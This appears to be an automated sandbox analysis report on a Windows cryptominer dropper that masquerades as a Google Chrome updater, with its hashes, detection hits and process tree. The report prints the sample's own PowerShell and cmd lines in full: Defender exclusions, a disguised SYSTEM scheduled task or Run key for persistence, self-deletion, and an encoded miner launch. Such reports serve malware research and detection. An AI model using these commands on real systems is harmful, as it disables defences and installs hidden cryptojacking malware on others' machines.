Overview
overview
10Static
static
3grhsghsGHs...y8.exe
windows7-x64
10grhsghsGHs...SE.exe
windows7-x64
10grhsghsGHs...CD.exe
windows7-x64
10grhsghsGHs...Da.exe
windows7-x64
10grhsghsGHs...wq.exe
windows7-x64
10grhsghsGHs...r7.exe
windows7-x64
10grhsghsGHs...XJ.exe
windows7-x64
10grhsghsGHs...eg.exe
windows7-x64
10grhsghsGHs...5H.exe
windows7-x64
10grhsghsGHs...XN.exe
windows7-x64
10grhsghsGHs...T3.exe
windows7-x64
10grhsghsGHs...9r.exe
windows7-x64
10grhsghsGHs...GR.exe
windows7-x64
10grhsghsGHs...EX.exe
windows7-x64
10grhsghsGHs...EA.exe
windows7-x64
10grhsghsGHs...FB.exe
windows7-x64
10grhsghsGHs...Et.exe
windows7-x64
10grhsghsGHs...KX.exe
windows7-x64
10grhsghsGHs...Qp.exe
windows7-x64
10grhsghsGHs...ep.exe
windows7-x64
10grhsghsGHs...5e.exe
windows7-x64
10grhsghsGHs...EP.exe
windows7-x64
10grhsghsGHs...pS.exe
windows7-x64
10grhsghsGHs...HZ.exe
windows7-x64
10grhsghsGHs...Sj.exe
windows7-x64
10grhsghsGHs...Nq.exe
windows7-x64
10grhsghsGHs...Ey.exe
windows7-x64
10Resubmissions
25-01-2024 16:55
240125-vfcyksbhgr 1024-01-2024 17:15
240124-vstf4aecaj 1023-01-2024 19:27
240123-x6cfvagbd9 1023-01-2024 19:27
240123-x6bvbafgem 1023-01-2024 19:27
240123-x6bjjsgbd8 1023-01-2024 19:27
240123-x6ax1sfgek 1023-01-2024 19:27
240123-x6abgsfgej 1023-01-2024 19:27
240123-x591qagbd7 1023-01-2024 19:27
240123-x59d7agbd6 1023-01-2024 19:27
240123-x584esgbd5 10Analysis
-
max time kernel
335s -
max time network
1804s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
25-01-2024 16:55
Static task
static1
Behavioral task
behavioral1
Sample
grhsghsGHswgh/3JynzWc6LxNCT2y8.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
grhsghsGHswgh/6aNn9vLJCQVfagSE.exe
Resource
win7-20231215-en
Behavioral task
behavioral3
Sample
grhsghsGHswgh/6vHkJ4UErTSS5ECD.exe
Resource
win7-20231215-en
Behavioral task
behavioral4
Sample
grhsghsGHswgh/Be5sCbvuma2nkHDa.exe
Resource
win7-20231129-en
Behavioral task
behavioral5
Sample
grhsghsGHswgh/DLKFnAGYJBNTnxwq.exe
Resource
win7-20231215-en
Behavioral task
behavioral6
Sample
grhsghsGHswgh/EtPLMpbCyFJpMJr7.exe
Resource
win7-20231215-en
Behavioral task
behavioral7
Sample
grhsghsGHswgh/Gu3PdXt79NF7EJXJ.exe
Resource
win7-20231215-en
Behavioral task
behavioral8
Sample
grhsghsGHswgh/JqLvG94UkYjhxAeg.exe
Resource
win7-20231215-en
Behavioral task
behavioral9
Sample
grhsghsGHswgh/LM3BR4UBmKBzBP5H.exe
Resource
win7-20231215-en
Behavioral task
behavioral10
Sample
grhsghsGHswgh/M8xUNW42QxTLMRXN.exe
Resource
win7-20231129-en
Behavioral task
behavioral11
Sample
grhsghsGHswgh/Q5EUCWHU7pMYBfT3.exe
Resource
win7-20231129-en
Behavioral task
behavioral12
Sample
grhsghsGHswgh/UMRsPGc4u9tycx9r.exe
Resource
win7-20231215-en
Behavioral task
behavioral13
Sample
grhsghsGHswgh/UU4Ddwqm5zcuLzGR.exe
Resource
win7-20231215-en
Behavioral task
behavioral14
Sample
grhsghsGHswgh/XJEzW6M7WvHaF3EX.exe
Resource
win7-20231215-en
Behavioral task
behavioral15
Sample
grhsghsGHswgh/Y2JYGshMHJGuGREA.exe
Resource
win7-20231129-en
Behavioral task
behavioral16
Sample
grhsghsGHswgh/Yvdp8t5knpQz7sFB.exe
Resource
win7-20231215-en
Behavioral task
behavioral17
Sample
grhsghsGHswgh/anDwkygzqtN6BKEt.exe
Resource
win7-20231129-en
Behavioral task
behavioral18
Sample
grhsghsGHswgh/bW3Td8vedKuGbSKX.exe
Resource
win7-20231215-en
Behavioral task
behavioral19
Sample
grhsghsGHswgh/cZ8JugqVuxAY52Qp.exe
Resource
win7-20231129-en
Behavioral task
behavioral20
Sample
grhsghsGHswgh/h5JMkDJvUkEMMWep.exe
Resource
win7-20231129-en
Behavioral task
behavioral21
Sample
grhsghsGHswgh/qM5GMXBk6hJE6Y5e.exe
Resource
win7-20231215-en
Behavioral task
behavioral22
Sample
grhsghsGHswgh/rUqNxUB6WWxdsfEP.exe
Resource
win7-20231215-en
Behavioral task
behavioral23
Sample
grhsghsGHswgh/rkUvkExvRhkxKUpS.exe
Resource
win7-20231129-en
Behavioral task
behavioral24
Sample
grhsghsGHswgh/u3GgbfA2e32fHMHZ.exe
Resource
win7-20231215-en
Behavioral task
behavioral25
Sample
grhsghsGHswgh/xQQTm7rAusnqpUSj.exe
Resource
win7-20231215-en
Behavioral task
behavioral26
Sample
grhsghsGHswgh/xxgg94VsN5GYyJNq.exe
Resource
win7-20231215-en
General
-
Target
grhsghsGHswgh/qM5GMXBk6hJE6Y5e.exe
-
Size
2.0MB
-
MD5
a16a669a09bf158058b83e04e69fe38e
-
SHA1
f6c94763850d9e590d86057139e8895a7aacdeea
-
SHA256
cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e
-
SHA512
658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6
-
SSDEEP
49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 9 IoCs
description pid Process procid_target PID 2208 created 1288 2208 qM5GMXBk6hJE6Y5e.exe 10 PID 2208 created 1288 2208 qM5GMXBk6hJE6Y5e.exe 10 PID 2208 created 1288 2208 qM5GMXBk6hJE6Y5e.exe 10 PID 2208 created 1288 2208 qM5GMXBk6hJE6Y5e.exe 10 PID 2824 created 1288 2824 updater.exe 10 PID 2824 created 1288 2824 updater.exe 10 PID 2824 created 1288 2824 updater.exe 10 PID 2824 created 1288 2824 updater.exe 10 PID 2824 created 1288 2824 updater.exe 10 -
XMRig Miner payload 30 IoCs
resource yara_rule behavioral21/memory/2236-71-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/2236-73-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/2236-75-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/2236-76-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/2236-80-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/2236-82-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/2236-84-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/2236-86-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/2236-88-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/2236-90-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/2236-92-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/2236-94-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/2236-96-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/2236-98-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/2236-100-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/2236-102-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/2236-104-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/2236-106-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/2236-108-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/2236-110-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/2236-117-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/2236-119-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/2236-121-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/2236-123-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/2236-125-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/2236-127-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/2236-129-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/2236-131-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/2236-133-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral21/memory/2236-135-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig -
Deletes itself 1 IoCs
pid Process 2740 cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 2824 updater.exe -
Loads dropped DLL 1 IoCs
pid Process 2284 taskeng.exe -
resource yara_rule behavioral21/memory/2236-65-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/2236-71-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/2236-73-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/2236-75-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/2236-76-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/2236-80-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/2236-82-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/2236-84-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/2236-86-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/2236-88-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/2236-90-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/2236-92-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/2236-94-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/2236-96-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/2236-98-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/2236-100-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/2236-102-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/2236-104-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/2236-106-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/2236-108-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/2236-110-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/2236-117-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/2236-119-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/2236-121-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/2236-123-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/2236-125-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/2236-127-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/2236-129-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/2236-131-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/2236-133-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral21/memory/2236-135-0x0000000140000000-0x00000001407F4000-memory.dmp upx -
Drops file in System32 directory 5 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2824 set thread context of 2812 2824 updater.exe 52 PID 2824 set thread context of 2236 2824 updater.exe 53 -
Drops file in Program Files directory 4 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\updater.exe qM5GMXBk6hJE6Y5e.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Libs\g.log cmd.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2660 schtasks.exe 2828 schtasks.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1364 WMIC.exe -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 10884d30b44fda01 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe -
Suspicious behavior: EnumeratesProcesses 25 IoCs
pid Process 2208 qM5GMXBk6hJE6Y5e.exe 2208 qM5GMXBk6hJE6Y5e.exe 3044 powershell.exe 2208 qM5GMXBk6hJE6Y5e.exe 2208 qM5GMXBk6hJE6Y5e.exe 2728 powershell.exe 2208 qM5GMXBk6hJE6Y5e.exe 2208 qM5GMXBk6hJE6Y5e.exe 2208 qM5GMXBk6hJE6Y5e.exe 2208 qM5GMXBk6hJE6Y5e.exe 2856 powershell.exe 2824 updater.exe 2824 updater.exe 1368 powershell.exe 2824 updater.exe 2824 updater.exe 1516 powershell.exe 2824 updater.exe 2824 updater.exe 2824 updater.exe 2824 updater.exe 2812 conhost.exe 2812 conhost.exe 2824 updater.exe 2824 updater.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 464 Process not Found -
Suspicious use of AdjustPrivilegeToken 31 IoCs
description pid Process Token: SeDebugPrivilege 3044 powershell.exe Token: SeDebugPrivilege 2728 powershell.exe Token: SeDebugPrivilege 2856 powershell.exe Token: SeDebugPrivilege 1368 powershell.exe Token: SeDebugPrivilege 1516 powershell.exe Token: SeDebugPrivilege 2824 updater.exe Token: SeAssignPrimaryTokenPrivilege 1364 WMIC.exe Token: SeIncreaseQuotaPrivilege 1364 WMIC.exe Token: SeSecurityPrivilege 1364 WMIC.exe Token: SeTakeOwnershipPrivilege 1364 WMIC.exe Token: SeLoadDriverPrivilege 1364 WMIC.exe Token: SeSystemtimePrivilege 1364 WMIC.exe Token: SeBackupPrivilege 1364 WMIC.exe Token: SeRestorePrivilege 1364 WMIC.exe Token: SeShutdownPrivilege 1364 WMIC.exe Token: SeSystemEnvironmentPrivilege 1364 WMIC.exe Token: SeUndockPrivilege 1364 WMIC.exe Token: SeManageVolumePrivilege 1364 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1364 WMIC.exe Token: SeIncreaseQuotaPrivilege 1364 WMIC.exe Token: SeSecurityPrivilege 1364 WMIC.exe Token: SeTakeOwnershipPrivilege 1364 WMIC.exe Token: SeLoadDriverPrivilege 1364 WMIC.exe Token: SeSystemtimePrivilege 1364 WMIC.exe Token: SeBackupPrivilege 1364 WMIC.exe Token: SeRestorePrivilege 1364 WMIC.exe Token: SeShutdownPrivilege 1364 WMIC.exe Token: SeSystemEnvironmentPrivilege 1364 WMIC.exe Token: SeUndockPrivilege 1364 WMIC.exe Token: SeManageVolumePrivilege 1364 WMIC.exe Token: SeLockMemoryPrivilege 2236 conhost.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 2728 wrote to memory of 2660 2728 powershell.exe 31 PID 2728 wrote to memory of 2660 2728 powershell.exe 31 PID 2728 wrote to memory of 2660 2728 powershell.exe 31 PID 2740 wrote to memory of 2580 2740 cmd.exe 34 PID 2740 wrote to memory of 2580 2740 cmd.exe 34 PID 2740 wrote to memory of 2580 2740 cmd.exe 34 PID 2856 wrote to memory of 2636 2856 powershell.exe 35 PID 2856 wrote to memory of 2636 2856 powershell.exe 35 PID 2856 wrote to memory of 2636 2856 powershell.exe 35 PID 2284 wrote to memory of 2824 2284 taskeng.exe 36 PID 2284 wrote to memory of 2824 2284 taskeng.exe 36 PID 2284 wrote to memory of 2824 2284 taskeng.exe 36 PID 1516 wrote to memory of 2828 1516 powershell.exe 45 PID 1516 wrote to memory of 2828 1516 powershell.exe 45 PID 1516 wrote to memory of 2828 1516 powershell.exe 45 PID 2824 wrote to memory of 2812 2824 updater.exe 52 PID 656 wrote to memory of 1364 656 cmd.exe 46 PID 656 wrote to memory of 1364 656 cmd.exe 46 PID 656 wrote to memory of 1364 656 cmd.exe 46 PID 2824 wrote to memory of 2236 2824 updater.exe 53 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1288
-
C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\qM5GMXBk6hJE6Y5e.exe"C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\qM5GMXBk6hJE6Y5e.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:2208
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3044
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2728
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\qM5GMXBk6hJE6Y5e.exe"2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:2740
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2856
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1368
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1516 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:2828
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:656
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe qtdiqnkejoz2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2812
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2236
-
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"1⤵
- Creates scheduled task(s)
PID:2660
-
C:\Windows\System32\choice.exechoice /C Y /N /D Y /T 31⤵PID:2580
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC1⤵PID:2636
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2824
-
C:\Windows\system32\taskeng.exetaskeng.exe {5193C022-1865-4CD7-AAA2-973851F49BD2} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2284
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor1⤵
- Detects videocard installed
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1364
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"1⤵
- Drops file in Program Files directory
PID:1100
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
161KB
MD5c37705764a389172c952c45e2f98d14d
SHA1cdad0e96859181a4ba14842a7bc372b6f041fa52
SHA256c7b7d1a25c38292ea3c03d633146e36fd6d560a465d7b404000d0894549171fc
SHA512e3f790ab2d5cc694d60eeef66e8a2ac2a2fca767a238e01dff0f44dd422060beb72e18dea2da18541d19200782a694fcec863ecd2e102a217387815441214ff4
-
Filesize
100KB
MD58262c368a647f3d65f43f0f4c55597a3
SHA1c63ebec2c3dbdf8c99713389cff085ac90101cb7
SHA2566e96c6a3b0a7cf21b71142c9de89cfa28792dec93bdf002a1d5c6e27885871c9
SHA512e3e566952e9eda5f7e140ee89def6242f0e83cff3a494a944cff837e6fc6b55df19cddb2724ae0600dc0711698a5da621d9ebbc90492f0af785d9c685c8937ec
-
Filesize
198B
MD537dd19b2be4fa7635ad6a2f3238c4af1
SHA1e5b2c034636b434faee84e82e3bce3a3d3561943
SHA2568066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07
SHA51286e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD56156e6a3111877edee6e7fbb698a36b1
SHA17b725117647da3e3c17ed44e23abe7d7477807af
SHA256eb0834a7374ec31b658c3541b1774329514694f6d62711dab2b5d2ecc2727389
SHA51238c708dff2d6e8ba854a5cd4bd8edc3d354fecdc5f73fcbbf63e20bf0875400c2f4912c93ab6b5e591861b814c9234ef8c0b16b83b11625f7ce472f70b69b971
-
Filesize
310KB
MD5c39aa133023cb5ad0b4053b70ed8f7cf
SHA122a53807f12d700ee06016f810c34d161f925d8f
SHA2569d760bce55faa9b6c57f82a793eab37e6fdf958fc4d082951acb805361182f71
SHA51264d28318a851107900ad68d375af376b0a9309dcaf5242e45b28eab9d345bfb70746b2c4c4407d75cc0f1bd320dbdc70cc2be7841034e0ea298dbfcdc5ff656d